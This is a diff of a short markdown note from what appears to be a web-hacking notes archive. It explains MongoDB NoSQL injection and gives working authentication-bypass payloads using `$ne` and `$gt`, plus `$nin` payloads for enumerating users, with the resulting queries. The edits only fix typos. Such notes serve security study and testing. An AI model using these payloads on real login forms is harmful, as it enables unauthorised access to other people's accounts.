7RU7H/Archive/Web-Application-Hacking/SQLi/NoSQLInjection.md

 ['KEY' => 'VALUE', 'KEY' => 'VALUE']
 ['KEY' => ['$lt'=>'1337']]` # Logic can eb used to filter
 ```
-Although keys in this instance can be strings, properties to which the value is some string relationed to it storage key: `["username" : "admin"]
+Although keys in this instance can be strings, properties to which the value is some string relation to it storage key: `["username" : "admin"]

 #### MongoDB injection

 Due NoSQL queries requiring nested associative arrays a NoSQL injection must be capable of injecting arrays into the application.

-This will authenication bypass to the first user in the database:
+This will authentication bypass to the first user in the database:
 `user[$ne]=xxxx&pass[$ne]=yyyy` or `user[$gt]=xxxx&pass[$gt]=yyyy`
 query performed:
 `['username'=>['$ne'=>['yyyy'] ], 'password'=>['$ne'=>'yyyy']]`
-To get the nth users, create filter with $nin by specifying criteria where the desired documents have some field, not in a list of values:
+To get the nth users, create filter with `$nin` by specifying criteria where the desired documents have some field, not in a list of values:
 `user[$nin][]=xxxx&pass[$ne]=yyyy`
 The query performed:
 `['username'=>['$nin'=>['admin'] ], 'password'=>['$ne'=>'00001111']]`